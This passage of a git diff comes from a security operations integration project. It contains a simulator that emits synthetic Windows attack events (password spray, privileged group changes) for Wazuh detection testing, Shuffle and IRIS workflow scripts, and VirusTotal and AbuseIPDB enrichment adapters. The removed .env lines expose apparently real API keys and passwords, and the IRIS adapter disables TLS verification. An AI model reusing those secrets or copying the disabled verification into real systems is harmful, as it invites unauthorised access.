+    "event_id=4624 account=\"svc_backup\" logon_type=2"
247
+  emit_windows_usecase "A4-11" "A4" "high" "Windows Account Added to Privileged Custom Group" \
248
+    "event_id=4732 account=\"user3\" target_group=\"SOC-Privileged-Custom\""
249
+  emit_windows_usecase "A4-12" "A4" "high" "Windows Account Added to Privileged Group" \
250
+    "event_id=4728 account=\"user3\" target_group=\"Domain Admins\""
251
+  emit_windows_usecase "A4-13" "A4" "high" "Windows Domain Configure DSRM Password Reset" \
252
+    "event_id=4794 account=\"administrator\" action=\"dsrm-password-reset\""
253
+  emit_windows_usecase "A4-14" "A4" "low" "Windows Authentication Multiple Fail One Account from Many Sources" \
254
+    "event_id=4625 account=\"user4\" src_count=15 fail_count=28"
255
+  emit_windows_usecase "A4-15" "A4" "low" "Windows Authentication Multiple Fail Many Accounts from One Source" \
256
+    "event_id=4625 src_ip=$(rand_private_ip) account_count=18 fail_count=42"
257
+  emit_windows_usecase "A4-16" "A4" "low" "Windows Authentication Multiple Fail from Guest Account" \
258
+    "event_id=4625 account=\"guest\" fail_count=9"
259
+  emit_windows_usecase "A4-17" "A4" "low" "Windows Authentication Multiple Fail One Account from One Source" \
260
+    "event_id=4625 account=\"user5\" src_ip=$(rand_private_ip) fail_count=10"
261
+  emit_windows_usecase "A4-18" "A4" "low" "Windows Authentication Multiple Interactive Logon Denied" \
262
+    "event_id=4625 account=\"user6\" logon_type=2 fail_count=7"
263
+  emit_windows_usecase "A4-19" "A4" "low" "Windows Authentication Password Spray" \
264
+    "event_id=4625 spray=true src_ip=$(rand_public_ip) attempted_accounts=25"
265
+  emit_windows_usecase "A4-20" "A4" "low" "Windows Authentication Attempt from Disabled Account" \
266
+    "event_id=4625 account=\"disabled.user\" status=\"0xC0000072\""
267
+  emit_windows_usecase "A4-21" "A4" "low" "Windows Domain Account Created" \
268
+    "event_id=4720 account=\"new.domain.user\" account_type=\"domain\""
269
+  emit_windows_usecase "A4-22" "A4" "low" "Windows Local Account Re Enabled" \
270
+    "event_id=4722 account=\"local.user\" account_type=\"local\""
271
+  emit_windows_usecase "A4-23" "A4" "low" "Windows Local Account Created" \
272
+    "event_id=4720 account=\"local.new\" account_type=\"local\""
273
+  emit_windows_usecase "A4-24" "A4" "low" "Windows Domain Account Re Enabled" \
274
+    "event_id=4722 account=\"domain.reenabled\" account_type=\"domain\""
275
+}
276
+
277
+emit_selected_set() {
278
+  local sel
279
+  sel="$(echo "${SELECTOR}" | tr '[:upper:]' '[:lower:]')"
280
+
281
+  case "${sel}" in
282
+    all)
283
+      emit_a1
284
+      emit_a2
285
+      emit_a3
286
+      emit_a4
287
+      ;;
288
+    a1|a1-*)
289
+      emit_a1
290
+      ;;
291
+    a2|a2-*)
292
+      emit_a2
293
+      ;;
294
+    a3|a3-*)
295
+      emit_a3
296
+      ;;
297
+    a4|a4-*)
298
+      emit_a4
299
+      ;;
300
+    *)
301
+      # Exact usecase selectors (e.g. A3-05) are handled by selector_matches.
302
+      emit_a1
303
+      emit_a2
304
+      emit_a3
305
+      emit_a4
306
+      ;;
307
+  esac
308
+}
309
+
310
+echo "starting proposal-required log simulator"
311
+echo "selector=${SELECTOR} count=${COUNT} delay=${DELAY}s event_delay=${EVENT_DELAY}s dry_run=${DRY_RUN}"
312
+echo "target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
313
+
314
+if [[ "${FOREVER}" == "true" ]]; then
315
+  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
316
+  trap 'echo; echo "stopped"; exit 0' INT TERM
317
+  while true; do
318
+    emit_selected_set
319
+    sleep "${DELAY}"
320
+  done
321
+else
322
+  for ((i=1; i<=COUNT; i++)); do
323
+    emit_selected_set
324
+    if [[ "${i}" -lt "${COUNT}" ]]; then
325
+      sleep "${DELAY}"
326
+    fi
327
+  done
328
+  echo "done"
329
+fi

+ 33 - 5
scripts/send-wazuh-test-events.sh

@@ -4,6 +4,20 @@ set -euo pipefail
4 4
 SCENARIO="${1:-all}"
5 5
 COUNT="${2:-1}"
6 6
 DELAY="${3:-0.3}"
7
+FOREVER="false"
8
+
9
+for arg in "${@:4}"; do
10
+  case "${arg}" in
11
+    --forever)
12
+      FOREVER="true"
13
+      ;;
14
+    *)
15
+      echo "error: unexpected argument '${arg}'"
16
+      echo "usage: scripts/send-wazuh-test-events.sh [scenario] [count] [delay_seconds] [--forever]"
17
+      exit 1
18
+      ;;
19
+  esac
20
+done
7 21
 
8 22
 WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
9 23
 WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
@@ -16,6 +30,11 @@ if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
16 30
   exit 1
17 31
 fi
18 32
 
33
+if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
34
+  echo "error: delay must be numeric (example: 0.5)"
35
+  exit 1
36
+fi
37
+
19 38
 emit_syslog() {
20 39
   local msg="$1"
21 40
   local sent="false"
@@ -96,9 +115,18 @@ send_once() {
96 115
   esac
97 116
 }
98 117
 
99
-for ((i=1; i<=COUNT; i++)); do
100
-  send_once
101
-  if [[ "${i}" -lt "${COUNT}" ]]; then
118
+if [[ "${FOREVER}" == "true" ]]; then
119
+  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
120
+  trap 'echo; echo "stopped"; exit 0' INT TERM
121
+  while true; do
122
+    send_once
102 123
     sleep "${DELAY}"
103
-  fi
104
-done
124
+  done
125
+else
126
+  for ((i=1; i<=COUNT; i++)); do
127
+    send_once
128
+    if [[ "${i}" -lt "${COUNT}" ]]; then
129
+      sleep "${DELAY}"
130
+    fi
131
+  done
132
+fi

+ 77 - 0
scripts/update-shuffle-workflow-from-template.sh

@@ -0,0 +1,77 @@
1
+#!/usr/bin/env bash
2
+set -euo pipefail
3
+
4
+SHUFFLE_BASE_URL="${SHUFFLE_BASE_URL:-http://localhost:5001}"
5
+SHUFFLE_API_KEY="${SHUFFLE_API_KEY:-}"
6
+WORKFLOW_ID="${1:-0b2c5b48-0e02-49a3-8e12-2bc892ac15f9}"
7
+TEMPLATE_FILE="${2:-shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.json}"
8
+
9
+if [[ -z "${SHUFFLE_API_KEY}" ]]; then
10
+  echo "error: SHUFFLE_API_KEY is required"
11
+  echo "example: SHUFFLE_API_KEY=xxxx scripts/update-shuffle-workflow-from-template.sh"
12
+  exit 1
13
+fi
14
+
15
+if [[ ! -f "${TEMPLATE_FILE}" ]]; then
16
+  echo "error: template file not found: ${TEMPLATE_FILE}"
17
+  exit 1
18
+fi
19
+
20
+tmp_payload="$(mktemp)"
21
+trap 'rm -f "${tmp_payload}"' EXIT
22
+
23
+python3 - "${TEMPLATE_FILE}" "${WORKFLOW_ID}" > "${tmp_payload}" <<'PY'
24
+import json
25
+import sys
26
+
27
+template_file = sys.argv[1]
28
+workflow_id = sys.argv[2]
29
+
30
+with open(template_file, "r", encoding="utf-8") as fh:
31
+    wf = json.load(fh)
32
+
33
+wf["id"] = workflow_id
34
+
35
+for field in ("created", "edited", "last_runtime", "owner", "updated_by"):
36
+    wf.pop(field, None)
37
+
38
+print(json.dumps(wf))
39
+PY
40
+
41
+curl -sS -o /tmp/shuffle_workflow_update_resp.json -w "%{http_code}" \
42
+  -X PUT "${SHUFFLE_BASE_URL}/api/v1/workflows/${WORKFLOW_ID}" \
43
+  -H "Authorization: Bearer ${SHUFFLE_API_KEY}" \
44
+  -H "Content-Type: application/json" \
45
+  --data-binary "@${tmp_payload}" >/tmp/shuffle_workflow_update_status.txt
46
+
47
+http_status="$(cat /tmp/shuffle_workflow_update_status.txt)"
48
+response="$(cat /tmp/shuffle_workflow_update_resp.json)"
49
+
50
+if [[ "${http_status}" != "200" ]]; then
51
+  echo "error: workflow update failed (HTTP ${http_status})"
52
+  echo "${response}"
53
+  exit 1
54
+fi
55
+
56
+WORKFLOW_UPDATE_RESPONSE="${response}" python3 - <<'PY'
57
+import json
58
+import os
59
+import sys
60
+
61
+raw = os.environ.get("WORKFLOW_UPDATE_RESPONSE", "")
62
+try:
63
+    data = json.loads(raw)
64
+except Exception:
65
+    print("updated, but response is not valid JSON:")
66
+    print(raw[:600])
67
+    sys.exit(0)
68
+
69
+if isinstance(data, dict) and data.get("success") is False:
70
+    print("error: API returned success=false")
71
+    print(raw)
72
+    sys.exit(1)
73
+
74
+workflow_id = data.get("id") if isinstance(data, dict) else None
75
+name = data.get("name") if isinstance(data, dict) else None
76
+print(f"updated: {name or '<unknown>'} id={workflow_id or '<unknown>'}")
77
+PY

Разница между файлами не показана из-за своего большого размера
+ 196 - 0
shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.json


+ 67 - 0
shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.md

@@ -0,0 +1,67 @@
1
+# Sample Workflow: Input Trigger -> Condition -> IRIS Ticket
2
+
3
+Workflow file:
4
+
5
+- `shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.json`
6
+
7
+## Purpose
8
+
9
+Accept payload data from `soc-integrator`, evaluate a condition, and create a new IRIS ticket when matched.
10
+
11
+Note: In your current environment, `Shuffle Tools 1.2.0` does not include the `webhook` action. This sample uses a supported start node (`repeat_back_to_me`) and should be triggered via `POST /api/v1/workflows/{id}/execute`.
12
+
13
+Condition in sample:
14
+
15
+- `source` in `["soc-integrator", "wazuh", "fortigate"]`
16
+- `severity` in `["high", "critical"]`
17
+
18
+If condition is not matched, workflow exits without ticket creation.
19
+
20
+## Import into Shuffle
21
+
22
+1. Open Shuffle UI.
23
+2. Go to Workflows.
24
+3. Import workflow JSON:
25
+   - `shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.json`
26
+4. Save and open the workflow.
27
+5. Keep the workflow ID for execute API calls.
28
+
29
+## Update Existing Workflow By ID
30
+
31
+To update an already-created workflow (for example `0b2c5b48-0e02-49a3-8e12-2bc892ac15f9`) with this template:
32
+
33
+```bash
34
+SHUFFLE_BASE_URL="http://localhost:5001" \
35
+SHUFFLE_API_KEY="<YOUR_API_KEY>" \
36
+scripts/update-shuffle-workflow-from-template.sh \
37
+0b2c5b48-0e02-49a3-8e12-2bc892ac15f9 \
38
+shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.json
39
+```
40
+
41
+Then open:
42
+
43
+- `http://localhost:3001/workflows/0b2c5b48-0e02-49a3-8e12-2bc892ac15f9`
44
+
45
+## Test Execute Payload
46
+
47
+```bash
48
+curl -sS -X POST "http://localhost:5001/api/v1/workflows/<WORKFLOW_ID>/execute" \
49
+  -H "Authorization: Bearer <SHUFFLE_API_KEY>" \
50
+  -H "Content-Type: application/json" \
51
+  -d '{
52
+    "execution_argument": "{\"event_id\":\"evt-001\",\"source\":\"soc-integrator\",\"severity\":\"high\",\"title\":\"Suspicious VPN login outside Thailand\",\"description\":\"Detected by SOC Integrator rule A3-05\",\"integrator_url\":\"http://soc-integrator:8080\",\"internal_key\":\"\"}"
53
+  }'
54
+```
55
+
56
+## soc-integrator Endpoint Used
57
+
58
+The sample uses:
59
+
60
+- `POST /action/create-iris-case`
61
+
62
+Base URL is supplied from webhook payload field `integrator_url` (default in workflow: `http://soc-integrator:8080`).
63
+
64
+## Notes
65
+
66
+- If your `soc-integrator` route is protected, pass `internal_key` and ensure backend expects `X-Internal-Key`.
67
+- You can tighten/replace the match condition by editing the Python code in action `Condition Match + Create IRIS Ticket`.

+ 0 - 34
soc-integrator/.env

@@ -1,34 +0,0 @@
1
-APP_ENV=dev
2
-LOG_LEVEL=INFO
3
-
4
-SOC_INTEGRATOR_INTERNAL_KEY=dev-internal-key
5
-SOC_INTEGRATOR_DB_HOST=soc-integrator-db
6
-SOC_INTEGRATOR_DB_PORT=5432
7
-SOC_INTEGRATOR_DB_NAME=soc_integrator
8
-SOC_INTEGRATOR_DB_USER=soc_integrator
9
-SOC_INTEGRATOR_DB_PASSWORD=soc_integrator_password
10
-
11
-WAZUH_BASE_URL=https://wazuh.manager:55000
12
-WAZUH_USERNAME=wazuh-wui
13
-WAZUH_PASSWORD=MyS3cr37P450r.*-
14
-WAZUH_INDEXER_URL=https://wazuh.indexer:9200
15
-WAZUH_INDEXER_USERNAME=admin
16
-WAZUH_INDEXER_PASSWORD=SecretPassword
17
-WAZUH_AUTO_SYNC_ENABLED=true
18
-WAZUH_AUTO_SYNC_INTERVAL_SECONDS=5
19
-WAZUH_AUTO_SYNC_QUERY=*
20
-WAZUH_AUTO_SYNC_LIMIT=50
21
-WAZUH_AUTO_SYNC_MINUTES=120
22
-
23
-SHUFFLE_BASE_URL=http://shuffle-backend:5001
24
-SHUFFLE_API_KEY=e9bf8031-038a-4ea9-9639-13eb08d535ab
25
-SHUFFLE_USERNAME=
26
-SHUFFLE_PASSWORD=
27
-
28
-PAGERDUTY_BASE_URL=http://pagerduty-stub
29
-PAGERDUTY_API_KEY=
30
-
31
-IRIS_BASE_URL=https://iriswebapp_nginx:8443
32
-IRIS_API_KEY=mq4FMyrcf255Snt6rgJbdIN67GGA2rQR5eMOjzE62GlQfV8JX6RSw92AHNeCjIWsZa__2IOKv3I6IhZTEPMaqw
33
-IRIS_DEFAULT_CUSTOMER_ID=1
34
-IRIS_DEFAULT_SOC_ID=

+ 2 - 0
soc-integrator/.env.example

@@ -32,3 +32,5 @@ IRIS_BASE_URL=https://iriswebapp_nginx:8443
32 32
 IRIS_API_KEY=
33 33
 IRIS_DEFAULT_CUSTOMER_ID=1
34 34
 IRIS_DEFAULT_SOC_ID=
35
+VIRUSTOTAL_API_KEY=
36
+ABUSEIPDB_API_KEY=

+ 37 - 0
soc-integrator/app/adapters/abuseipdb.py

@@ -0,0 +1,37 @@
1
+from __future__ import annotations
2
+
3
+from typing import Any
4
+
5
+import httpx
6
+
7
+
8
+class AbuseIpdbAdapter:
9
+    def __init__(self, base_url: str, api_key: str) -> None:
10
+        self.base_url = base_url.rstrip("/")
11
+        self.api_key = api_key
12
+
13
+    def _headers(self) -> dict[str, str]:
14
+        return {"Key": self.api_key, "Accept": "application/json"} if self.api_key else {}
15
+
16
+    async def check_ip(self, ip: str, max_age_in_days: int = 90, verbose: bool = True) -> dict[str, Any]:
17
+        if not self.api_key:
18
+            raise RuntimeError("AbuseIPDB API key is not configured")
19
+
20
+        url = f"{self.base_url}/check"
21
+        params = {
22
+            "ipAddress": ip.strip(),
23
+            "maxAgeInDays": max(1, int(max_age_in_days)),
24
+            "verbose": "true" if verbose else "false",
25
+        }
26
+        headers = self._headers()
27
+
28
+        async with httpx.AsyncClient(timeout=20.0) as client:
29
+            response = await client.get(url, headers=headers, params=params)
30
+            try:
31
+                response.raise_for_status()
32
+            except httpx.HTTPStatusError as exc:
33
+                detail = response.text.strip()
34
+                raise RuntimeError(
35
+                    f"AbuseIPDB returned {response.status_code} for {url}. Response: {detail}"
36
+                ) from exc
37
+            return response.json() if response.content else {"status_code": response.status_code}

+ 15 - 0
soc-integrator/app/adapters/iris.py

@@ -62,3 +62,18 @@ class IrisAdapter:
62 62
             response = await client.get(url, headers=headers)
63 63
             response.raise_for_status()
64 64
             return response.json() if response.content else {"status_code": response.status_code}
65
+
66
+    async def list_cases(self, limit: int = 50, offset: int = 0) -> dict[str, Any]:
67
+        headers = self._headers()
68
+        url = f"{self.base_url}/api/v2/cases"
69
+        params = {"limit": max(1, limit), "offset": max(0, offset)}
70
+        async with httpx.AsyncClient(verify=False, timeout=20.0) as client:
71
+            response = await client.get(url, params=params, headers=headers)
72
+            try:
73
+                response.raise_for_status()
74
+            except httpx.HTTPStatusError as exc:
75
+                detail = response.text.strip()
76
+                raise RuntimeError(
77
+                    f"IRIS returned {response.status_code} for {url}. Response: {detail}"
78
+                ) from exc
79
+            return response.json() if response.content else {"status_code": response.status_code}

+ 84 - 0
soc-integrator/app/adapters/virustotal.py

@@ -0,0 +1,84 @@
1
+from __future__ import annotations
2
+
3
+import base64
4
+from typing import Any
5
+
6
+import httpx
7
+
8
+
9
+class VirusTotalAdapter:
10
+    def __init__(self, base_url: str, api_key: str) -> None:
11
+        self.base_url = base_url.rstrip("/")
12
+        self.api_key = api_key
13
+
14
+    def _headers(self) -> dict[str, str]:
15
+        return {"x-apikey": self.api_key} if self.api_key else {}
16
+
17
+    def _build_path(self, ioc_type: str, ioc_value: str) -> str:
18
+        value = ioc_value.strip()
19
+        if ioc_type == "domain":
20
+            return f"/domains/{value}"
21
+        if ioc_type == "ip":
22
+            return f"/ip_addresses/{value}"
23
+        if ioc_type == "hash":
24
+            return f"/files/{value}"
25
+        if ioc_type == "url":
26
+            # VT URL ID is urlsafe base64(url) without trailing "="
27
+            encoded = base64.urlsafe_b64encode(value.encode("utf-8")).decode("utf-8").rstrip("=")
28
+            return f"/urls/{encoded}"
29
+        raise ValueError(f"Unsupported IOC type: {ioc_type}")
30
+
31
+    async def enrich_ioc(self, ioc_type: str, ioc_value: str) -> dict[str, Any]:
32
+        if not self.api_key:
33
+            raise RuntimeError("VirusTotal API key is not configured")
34
+
35
+        path = self._build_path(ioc_type, ioc_value)
36
+        url = f"{self.base_url}{path}"
37
+        headers = self._headers()
38
+
39
+        async with httpx.AsyncClient(timeout=20.0) as client:
40
+            response = await client.get(url, headers=headers)
41
+            try:
42
+                response.raise_for_status()
43
+            except httpx.HTTPStatusError as exc:
44
+                detail = response.text.strip()
45
+                raise RuntimeError(
46
+                    f"VirusTotal returned {response.status_code} for {url}. Response: {detail}"
47
+                ) from exc
48
+
49
+            return response.json() if response.content else {"status_code": response.status_code}
50
+
51
+    async def upload_file(self, filename: str, content: bytes) -> dict[str, Any]:
52
+        if not self.api_key:
53
+            raise RuntimeError("VirusTotal API key is not configured")
54
+
55
+        url = f"{self.base_url}/files"
56
+        headers = self._headers()
57
+        files = {"file": (filename, content)}
58
+
59
+        async with httpx.AsyncClient(timeout=60.0) as client:
60
+            response = await client.post(url, headers=headers, files=files)
61
+            try:
62
+                response.raise_for_status()
63
+            except httpx.HTTPStatusError as exc:
64
+                detail = response.text.strip()
65
+                raise RuntimeError(
66
+                    f"VirusTotal returned {response.status_code} for {url}. Response: {detail}"
67
+                ) from exc
68
+            return response.json() if response.content else {"status_code": response.status_code}
69
+
70
+    async def get_analysis(self, analysis_id: str) -> dict[str, Any]:
71
+        if not self.api_key:
72
+            raise RuntimeError("VirusTotal API key is not configured")
73
+        url = f"{self.base_url}/analyses/{analysis_id}"
74
+        headers = self._headers()
75
+        async with httpx.AsyncClient(timeout=20.0) as client:
76
+            response = await client.get(url, headers=headers)
77
+            try:
78
+                response.raise_for_status()
79
+            except httpx.HTTPStatusError as exc:
80
+                detail = response.text.strip()
81
+                raise RuntimeError(
82
+                    f"VirusTotal returned {response.status_code} for {url}. Response: {detail}"
83
+                ) from exc
84
+            return response.json() if response.content else {"status_code": response.status_code}

+ 5 - 0
soc-integrator/app/config.py

@@ -40,5 +40,10 @@ class Settings(BaseSettings):
40 40
     iris_default_customer_id: int = 1
41 41
     iris_default_soc_id: str = ""
42 42
 
43
+    virustotal_base_url: str = "https://www.virustotal.com/api/v3"
44
+    virustotal_api_key: str = ""
45
+    abuseipdb_base_url: str = "https://api.abuseipdb.com/api/v2"
46
+    abuseipdb_api_key: str = ""
47
+
43 48
 
44 49
 settings = Settings()

+ 25 - 0
soc-integrator/app/db.py

@@ -78,6 +78,25 @@ def init_schema() -> None:
78 78
         )
79 79
 
80 80
         cur.execute(
81
+            """
82
+            CREATE TABLE IF NOT EXISTS ioc_trace (
83
+              id BIGSERIAL PRIMARY KEY,
84
+              action TEXT NOT NULL,
85
+              ioc_type TEXT NOT NULL,
86
+              ioc_value TEXT NOT NULL,
87
+              providers JSONB NOT NULL,
88
+              request_payload JSONB NOT NULL,
89
+              response_payload JSONB NOT NULL,
90
+              matched BOOLEAN,
91
+              severity TEXT,
92
+              confidence DOUBLE PRECISION,
93
+              error TEXT,
94
+              created_at TIMESTAMPTZ NOT NULL DEFAULT NOW()
95
+            );
96
+            """
97
+        )
98
+
99
+        cur.execute(
81 100
             "CREATE INDEX IF NOT EXISTS idx_incident_events_incident_key_created_at ON incident_events(incident_key, created_at DESC);"
82 101
         )
83 102
         cur.execute(
@@ -86,3 +105,9 @@ def init_schema() -> None:
86 105
         cur.execute(
87 106
             "CREATE INDEX IF NOT EXISTS idx_escalation_audit_incident_key_attempted_at ON escalation_audit(incident_key, attempted_at DESC);"
88 107
         )
108
+        cur.execute(
109
+            "CREATE INDEX IF NOT EXISTS idx_ioc_trace_created_at ON ioc_trace(created_at DESC);"
110
+        )
111
+        cur.execute(
112
+            "CREATE INDEX IF NOT EXISTS idx_ioc_trace_type_value ON ioc_trace(ioc_type, ioc_value);"
113
+        )

+ 430 - 1
soc-integrator/app/main.py

@@ -2,17 +2,22 @@ import asyncio
2 2
 import logging
3 3
 from datetime import datetime, timezone
4 4
 
5
-from fastapi import Depends, FastAPI, HTTPException
5
+from fastapi import Depends, FastAPI, File, HTTPException, UploadFile
6 6
 
7
+from app.adapters.abuseipdb import AbuseIpdbAdapter
7 8
 from app.adapters.iris import IrisAdapter
8 9
 from app.adapters.pagerduty import PagerDutyAdapter
9 10
 from app.adapters.shuffle import ShuffleAdapter
11
+from app.adapters.virustotal import VirusTotalAdapter
10 12
 from app.adapters.wazuh import WazuhAdapter
11 13
 from app.config import settings
12 14
 from app.db import init_schema
13 15
 from app.models import (
14 16
     ActionCreateIncidentRequest,
15 17
     ApiResponse,
18
+    IocEnrichRequest,
19
+    IocEvaluateRequest,
20
+    IrisTicketCreateRequest,
16 21
     ShuffleLoginRequest,
17 22
     ShuffleProxyRequest,
18 23
     TriggerShuffleRequest,
@@ -46,6 +51,14 @@ iris_adapter = IrisAdapter(
46 51
     base_url=settings.iris_base_url,
47 52
     api_key=settings.iris_api_key,
48 53
 )
54
+virustotal_adapter = VirusTotalAdapter(
55
+    base_url=settings.virustotal_base_url,
56
+    api_key=settings.virustotal_api_key,
57
+)
58
+abuseipdb_adapter = AbuseIpdbAdapter(
59
+    base_url=settings.abuseipdb_base_url,
60
+    api_key=settings.abuseipdb_api_key,
61
+)
49 62
 
50 63
 repo = MvpRepository()
51 64
 mvp_service = MvpService(
@@ -297,6 +310,422 @@ async def create_iris_case(payload: ActionCreateIncidentRequest) -> ApiResponse:
297 310
     return ApiResponse(data={"iris": iris_result})
298 311
 
299 312
 
313
+@app.post("/iris/tickets", response_model=ApiResponse)
314
+async def iris_create_ticket(payload: IrisTicketCreateRequest) -> ApiResponse:
315
+    case_payload = {
316
+        "case_name": payload.title,
317
+        "case_description": payload.description,
318
+        "case_customer": payload.case_customer or settings.iris_default_customer_id,
319
+        "case_soc_id": payload.case_soc_id or settings.iris_default_soc_id,
320
+    }
321
+    if payload.payload:
322
+        case_payload.update(payload.payload)
323
+    try:
324
+        iris_result = await iris_adapter.create_case(case_payload)
325
+    except Exception as exc:
326
+        raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc
327
+    return ApiResponse(data={"iris": iris_result})
328
+
329
+
330
+@app.get("/iris/tickets", response_model=ApiResponse)
331
+async def iris_list_tickets(limit: int = 50, offset: int = 0) -> ApiResponse:
332
+    try:
333
+        iris_result = await iris_adapter.list_cases(limit=limit, offset=offset)
334
+    except Exception as exc:
335
+        raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc
336
+    return ApiResponse(data={"iris": iris_result})
337
+
338
+
339
+def _build_vt_ioc_result(
340
+    vt: dict[str, object],
341
+    ioc_type: str,
342
+    ioc_value: str,
343
+    malicious_threshold: int,
344
+    suspicious_threshold: int,
345
+) -> tuple[dict[str, object], bool, str, float]:
346
+    stats = (
347
+        (((vt.get("data") or {}).get("attributes") or {}).get("last_analysis_stats"))
348
+        if isinstance(vt, dict)
349
+        else None
350
+    ) or {}
351
+
352
+    malicious = int(stats.get("malicious", 0) or 0)
353
+    suspicious = int(stats.get("suspicious", 0) or 0)
354
+    harmless = int(stats.get("harmless", 0) or 0)
355
+    undetected = int(stats.get("undetected", 0) or 0)
356
+    total = malicious + suspicious + harmless + undetected
357
+    confidence = 0.0 if total == 0 else round(((malicious + (0.5 * suspicious)) / total), 4)
358
+
359
+    matched = (malicious >= malicious_threshold) or (suspicious >= suspicious_threshold)
360
+    severity = "low"
361
+    if malicious >= 5 or suspicious >= 10:
362
+        severity = "critical"
363
+    elif malicious >= 2 or suspicious >= 5:
364
+        severity = "high"
365
+    elif malicious >= 1 or suspicious >= 1:
366
+        severity = "medium"
367
+
368
+    reason = (
369
+        f"virustotal_stats malicious={malicious} suspicious={suspicious} "
370
+        f"thresholds(malicious>={malicious_threshold}, suspicious>={suspicious_threshold})"
371
+    )
372
+
373
+    result: dict[str, object] = {
374
+        "ioc_type": ioc_type,
375
+        "ioc_value": ioc_value,
376
+        "matched": matched,
377
+        "severity": severity,
378
+        "confidence": confidence,
379
+        "reason": reason,
380
+        "providers": {
381
+            "virustotal": {
382
+                "stats": stats,
383
+            }
384
+        },
385
+        "raw": {
386
+            "virustotal": vt,
387
+        },
388
+    }
389
+    return result, matched, severity, confidence
390
+
391
+
392
+def _build_abuseipdb_ioc_result(
393
+    abuse: dict[str, object],
394
+    ioc_value: str,
395
+    confidence_threshold: int = 50,
396
+) -> tuple[dict[str, object], bool, str, float]:
397
+    data = ((abuse.get("data") if isinstance(abuse, dict) else None) or {}) if isinstance(abuse, dict) else {}
398
+    score = int(data.get("abuseConfidenceScore", 0) or 0)
399
+    total_reports = int(data.get("totalReports", 0) or 0)
400
+    matched = score >= confidence_threshold
401
+
402
+    severity = "low"
403
+    if score >= 90:
404
+        severity = "critical"
405
+    elif score >= 70:
406
+        severity = "high"
407
+    elif score >= 30:
408
+        severity = "medium"
409
+
410
+    confidence = round(score / 100.0, 4)
411
+    reason = f"abuseipdb score={score} totalReports={total_reports} threshold>={confidence_threshold}"
412
+    result: dict[str, object] = {
413
+        "ioc_type": "ip",
414
+        "ioc_value": ioc_value,
415
+        "matched": matched,
416
+        "severity": severity,
417
+        "confidence": confidence,
418
+        "reason": reason,
419
+        "providers": {"abuseipdb": {"score": score, "totalReports": total_reports, "raw": abuse}},
420
+    }
421
+    return result, matched, severity, confidence
422
+
423
+
424
+@app.post("/ioc/enrich", response_model=ApiResponse)
425
+async def ioc_enrich(payload: IocEnrichRequest) -> ApiResponse:
426
+    providers = [p.lower().strip() for p in payload.providers]
427
+    result: dict[str, object] = {
428
+        "ioc_type": payload.ioc_type,
429
+        "ioc_value": payload.ioc_value,
430
+        "providers_requested": providers,
431
+        "providers": {},
432
+    }
433
+
434
+    if "virustotal" in providers:
435
+        try:
436
+            vt = await virustotal_adapter.enrich_ioc(payload.ioc_type, payload.ioc_value)
437
+            result["providers"] = {**(result.get("providers") or {}), "virustotal": vt}
438
+        except Exception as exc:
439
+            repo.add_ioc_trace(
440
+                action="enrich",
441
+                ioc_type=payload.ioc_type,
442
+                ioc_value=payload.ioc_value,
443
+                providers=providers,
444
+                request_payload=payload.model_dump(mode="json"),
445
+                response_payload={},
446
+                error=str(exc),
447
+            )
448
+            raise HTTPException(status_code=502, detail=f"VirusTotal call failed: {exc}") from exc
449
+
450
+    if "abuseipdb" in providers:
451
+        if payload.ioc_type != "ip":
452
+            result["providers"] = {
453
+                **(result.get("providers") or {}),
454
+                "abuseipdb": {"skipped": "AbuseIPDB currently supports ioc_type='ip' only"},
455
+            }
456
+        else:
457
+            try:
458
+                abuse = await abuseipdb_adapter.check_ip(payload.ioc_value)
459
+                result["providers"] = {**(result.get("providers") or {}), "abuseipdb": abuse}
460
+            except Exception as exc:
461
+                repo.add_ioc_trace(
462
+                    action="enrich",
463
+                    ioc_type=payload.ioc_type,
464
+                    ioc_value=payload.ioc_value,
465
+                    providers=providers,
466
+                    request_payload=payload.model_dump(mode="json"),
467
+                    response_payload={},
468
+                    error=str(exc),
469
+                )
470
+                raise HTTPException(status_code=502, detail=f"AbuseIPDB call failed: {exc}") from exc
471
+
472
+    repo.add_ioc_trace(
473
+        action="enrich",
474
+        ioc_type=payload.ioc_type,
475
+        ioc_value=payload.ioc_value,
476
+        providers=providers,
477
+        request_payload=payload.model_dump(mode="json"),
478
+        response_payload=result,
479
+    )
480
+    return ApiResponse(data={"ioc": result})
481
+
482
+
483
+@app.post("/ioc/evaluate", response_model=ApiResponse)
484
+async def ioc_evaluate(payload: IocEvaluateRequest) -> ApiResponse:
485
+    providers = [p.lower().strip() for p in payload.providers]
486
+    supported = {"virustotal", "abuseipdb"}
487
+    requested = [p for p in providers if p in supported]
488
+    if not requested:
489
+        raise HTTPException(status_code=400, detail="No supported provider requested. Use ['virustotal'] or ['abuseipdb'].")
490
+
491
+    per_provider: dict[str, dict[str, object]] = {}
492
+    errors: dict[str, str] = {}
493
+
494
+    if "virustotal" in requested:
495
+        try:
496
+            vt = await virustotal_adapter.enrich_ioc(payload.ioc_type, payload.ioc_value)
497
+            vt_result, _, _, _ = _build_vt_ioc_result(
498
+                vt=vt,
499
+                ioc_type=payload.ioc_type,
500
+                ioc_value=payload.ioc_value,
501
+                malicious_threshold=payload.malicious_threshold,
502
+                suspicious_threshold=payload.suspicious_threshold,
503
+            )
504
+            per_provider["virustotal"] = vt_result
505
+        except Exception as exc:
506
+            errors["virustotal"] = str(exc)
507
+
508
+    if "abuseipdb" in requested:
509
+        if payload.ioc_type != "ip":
510
+            errors["abuseipdb"] = "AbuseIPDB supports ioc_type='ip' only"
511
+        else:
512
+            try:
513
+                abuse = await abuseipdb_adapter.check_ip(payload.ioc_value)
514
+                abuse_result, _, _, _ = _build_abuseipdb_ioc_result(
515
+                    abuse=abuse,
516
